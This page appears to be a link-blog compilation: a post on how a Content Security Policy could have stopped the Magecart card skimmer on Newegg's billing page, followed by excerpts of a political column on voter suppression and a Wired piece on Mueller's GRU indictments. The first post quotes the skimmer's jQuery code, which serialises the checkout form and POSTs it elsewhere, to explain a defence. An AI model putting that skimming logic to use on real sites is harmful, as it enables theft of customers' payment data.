How a Content Security Policy (CSP) Could Have Protected Newegg

Fifteen lines of code — 15 lines of JavaScript, to be precise — is all it took for Magecart (editor’s note: lol at that name) to capture payment data on Newegg’s billing page before sending it to a domain they registered. Here are those 15 lines:

window<span class="token punctuation">.</span><span class="token function-variable function">onload</span> <span class="token operator">=</span> <span class="token keyword">function</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
  <span class="token function">jQuery</span><span class="token punctuation">(</span><span class="token string">''</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">bind</span><span class="token punctuation">(</span><span class="token string">"mouseup touchend"</span><span class="token punctuation">,</span> <span class="token keyword">function</span><span class="token punctuation">(</span><span class="token parameter">e</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
   <span class="token keyword">var</span> dati <span class="token operator">=</span> <span class="token function">jQuery</span><span class="token punctuation">(</span><span class="token string">'#checkout'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
   <span class="token keyword">var</span> pdati <span class="token operator">=</span> <span class="token constant">JSON</span><span class="token punctuation">.</span><span class="token function">stringify</span><span class="token punctuation">(</span>dati<span class="token punctuation">.</span><span class="token function">serializeArray</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
   <span class="token function">setTimeout</span><span class="token punctuation">(</span><span class="token keyword">function</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
    jQuery<span class="token punctuation">.</span><span class="token function">ajax</span><span class="token punctuation">(</span><span class="token punctuation">{</span>
     type<span class="token punctuation">:</span> <span class="token string">"POST"</span><span class="token punctuation">,</span>
     async<span class="token punctuation">:</span> <span class="token boolean">true</span><span class="token punctuation">,</span>
     url<span class="token punctuation">:</span> <span class="token string">""</span><span class="token punctuation">,</span>
     data<span class="token punctuation">:</span> pdati<span class="token punctuation">,</span>
     dataType<span class="token punctuation">:</span> <span class="token string">'application/json'</span>
    <span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
   <span class="token punctuation">}</span><span class="token punctuation">,</span> <span class="token number">250</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span><span class="token punctuation">;</span>

We don’t know how this malicious code was injected on Newegg’s billing page, but we do know how Newegg could have drastically decreased the likelihood of a breach.

Content Security Policy

Content Security Policy (CSP) is a security standard which helps prevent cross-site scripting (XSS), clickjacking, and other code injection attacks resulting from execution of malicious content in a trusted web page context. It’s also supported and enforced by all major web browsers.

Looking at the code above, we can see that Magecart embedded an XHR request to CSP provides space for defining a rule that blocks this type of request by establishing policies to only permit certain types of content from safe sources. When configuring your web servers, make sure they are set to return the <a href="">Content-Security-Policy</a> HTTP header. For example:

  default-src 'self' *;
  img-src *;
  connect-src 'self'

For this particular breach, <a href="">connect-src</a> is the critical rule. Again, because we don’t know how the code was actually injected, we can’t be sure that CSP would prevent the injection itself. However, the connect-src directive would have prevented the HTTP request to send the data to somewhere else, especially a sneakily-named domain.

Last Exit Off the Road to Autocracy

Taxes and health care aren’t the only things on the ballot.

It’s a near-certainty that Democrats will receive more votes than Republicans, with polling suggesting a margin in votes cast for the House of Representatives of seven or more percentage points — which would make it the biggest landslide of modern times. However, gerrymandering and other factors have severely tilted the playing field, so that even this might not be enough to bring control of the chamber.

.. In fact, it’s not hyperbole to say that if the G.O.P. holds the line on Tuesday, it may be the last even halfway fair elections we’ll ever have.

.. Look at what’s happening in Georgia, where Brian Kemp — the Republican secretary of state, who oversees elections — is running for governor against Democrat Stacey Abrams. In any other democracy, letting a man supervise his own election would be inconceivable. But that’s how it is in Georgia, and Kemp is abusing his power to the max.

.. In recent years Kemp has purged millions of names from Georgia’s voting rolls, on dubious grounds. Finding himself in a close race despite these efforts, he tried to purge even more based on criteria so spurious that the courts have — for now — blocked his efforts. So over the weekend Kemp’s office issued a warning, with no evidence or specifics, that Democrats may have tried to hack the voter registration site.

A political party with any kind of commitment to democracy and fair play would treat Kemp as a pariah. Instead, he has the full support of the national G.O.P.

.. And Georgia is far from unique. There have been similar if less spectacular attempts to rig the vote in Kansas and North Dakota, where would-be absentee voters were told that they had to use the right color ink— and were given conflicting information about what color was acceptable.

.. The lesson we learn from all these abuses of power is that today’s Republicans are just like their fellow white nationalists in Hungary and Poland, who have maintained a democratic facade but have in reality established one-party authoritarian regimes.

.. Oh, and in case you’re tempted to bothsides this: No, both sides don’t do it. Voting restrictions are almost entirely a Republican thing. As always, Democrats aren’t saints, but they appear to believe in democracy, while their opponents don’t.

.. the media said it anyway), while tending to dismiss talk about Republican abuse of power as hysterical.


Wired: Indicting 12 Russian Hackers Could be Mueller’s Biggest Move Yet

The same unit, according to public reports, has been involved in attacks on

  • French president Emmanuel Macron,
  • NATO,
  • the German Parliament,
  • Georgia,

and other government targets across Europe.

.. Each of Mueller’s indictments, as they have come down, have demonstrated the incredible wealth of knowledge amassed by US intelligence and his team of investigators, and Friday was no exception. The indictment includes the specific allegations that between 4:19 and 4:56 pm on June 15, 2016, the defendants used their Moscow-based server to search for the same English words and phrases that Guccifer 2.0 used in “his” first blog post, where “he” claimed to be a lone Romanian hacker and claimed to be solely responsible for the attacks on Democratic targets.

.. It doesn’t rule out that future indictments might focus on the criminal behavior of Americans corresponding with the GRU or the IRA—nor would Americans necessarily have to know they were communicating with Russian intelligence officers to be guilty of various crimes.

.. the charging documents include intriguing breadcrumbs. The indictment references at one point that Guccifer 2.0 communicated with an unnamed US congressional candidate and, especially intriguingly, that the GRU for the first time began an attack on Hillary Clinton’s personal emails just hours after Trump publicly asked Russia for help in finding them.

.. one of the early tips to the US government that launched the FBI investigation eventually known by the codename CROSSFIRE HURRICANE: Trump aide George Papadopoulos telling an Australian diplomat in May 2016 that the Russians had dirt on Hillary Clinton, weeks before the GRU attacks became public. The charges against the GRU make clear that its effort began at least by March 2016. Papadopoulos, arrested last summer and already cooperating with Mueller’s team, might very have provided more information about where his information came from—and who, in addition to the Australians, he told.
Thus far, Mueller’s probe has focused on five distinct areas of interest:

1. An investigation into money laundering and past business dealings with Russia by people like former Trump campaign chairman Paul Manafort
2. The active information influence operations by Russian trolls and bots on social media, involving the Russian Internet Research Agency
3. The active cyber penetrations and operations against the DNC, DCCC, and Clinton campaign leader John Podesta
4. Contacts with Russian officials by Trump campaign officials during the course of the 2016 election and the transition, like George Papadopoulos and former national security advisor Michael Flynn
5. Obstruction of justice, whether the President or those around him sought to obstruct the investigation into Russian interference

.. What Mueller hasn’t done—yet—is show how these individual pieces come together. What level of coordination was there between the Internet Research Agency and the GRU or FSB? What ties, if any, exist between the business dealings of Manafort, Gates, and the Russian efforts to influence the election?

How coordinated were unexplained oddities, like the June 2016 Trump Tower meeting between Russians, and the Russian government efforts by the IRA, GRU, and FSB?

.. He knows far, far more than the public does. There was little sign in Friday’s indictment that any of it came from the cooperation and plea agreements he’s made with figures like Flynn, Gates, and Papadopoulos—meaning that their information, presumably critical enough to Mueller that he was willing to trade it for lighter sentencing, still hasn’t seen the light of day.